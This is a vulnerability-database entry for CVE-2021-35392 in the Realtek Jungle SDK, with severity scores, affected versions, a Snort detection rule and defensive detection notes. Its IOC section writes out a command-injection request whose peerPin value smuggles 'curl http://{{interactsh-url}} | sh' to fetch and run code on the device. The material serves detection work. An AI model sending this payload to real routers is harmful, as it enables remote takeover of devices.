cbcvebase.
CVE-2021-35392
published 2021-08-16

CVE-2021-35392: Realtek Jungle SDK version v2.x up to v3.4.14B provides a 'WiFi Simple Config' server that implements both UPnP and SSDP protocols. The binary is usually named…

PriorityP270high7.5CVSS 3.1
AVNACLPRNUINSUCNINAH
EXPLOIT
EPSS
83.15%
99.6th percentile
Realtek Jungle SDK version v2.x up to v3.4.14B provides a 'WiFi Simple Config' server that implements both UPnP and SSDP protocols. The binary is usually named wscd or mini_upnpd and is the successor to miniigd. The server is vulnerable to a heap buffer overflow that is present due to unsafe crafting of SSDP NOTIFY messages from received M-SEARCH messages ST header.

Affected

1 ranges
VendorProductVersion rangeFixed in
realtekrtl819x_jungle_software_development_kit2.0 – 3.4.14b

Detection & IOCsextracted from sources · hover to see the quote

url/goform/formWsc
path/goform/formWsc
commandsubmit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Realtek SDK - formRebootCheck/formWsc Stack Buffer Overflow Inbound (CVE-2021-35392)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/"; pcre:"/^form(RebootCheck|Wsc)$/R"; http.request_body; content:"submit-url="; fast_pattern; isdataat:2000,relative; reference:url,www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/; reference:cve,2021-35392; classtype:attempted-user; sid:2033837; rev:1; metadata:attack_target Server, created_at 2021_08_30, cve CVE_2021_35392, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, updated_at 2023_04_05, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Exploit targets the 'formWsc' page via HTTP POST to /goform/formWsc; injection occurs in the 'peerPin' parameter. Look for semicolons or shell metacharacters in the peerPin field.
  • The Snort/ET rule triggers on HTTP POST to /goform/formRebootCheck or /goform/formWsc with a request body containing 'submit-url=' and a body length exceeding 2000 bytes (isdataat:2000,relative), indicating an oversized/malicious payload.
  • The vulnerable binaries are named 'wscd' or 'mini_upnpd'. Monitor for these processes handling crafted SSDP NOTIFY/M-SEARCH messages on the network.
  • The heap buffer overflow is triggered via crafted SSDP NOTIFY messages derived from received M-SEARCH ST headers. Monitor SSDP traffic for anomalously large or malformed ST header values.
  • Nuclei template uses an OOB interaction check: a successful exploit causes the target to issue an outbound HTTP request with 'User-Agent: curl', which can be detected on egress or via canary/interactsh infrastructure.
  • ·The Nuclei template is tagged CVE-2021-35395 (command injection) but is included in sources for CVE-2021-35392 (heap buffer overflow). The two CVEs are distinct vulnerabilities in the same SDK; ensure detections are applied to the correct CVE.
  • ·The ET Snort rule (sid:2033837) covers both formRebootCheck and formWsc endpoints under CVE-2021-35392, so it may fire on either endpoint; tune accordingly to avoid false positives from legitimate WPS configuration traffic.

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
nvdv2.07.8HIGHAV:N/AC:L/Au:N/C:N/I:N/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.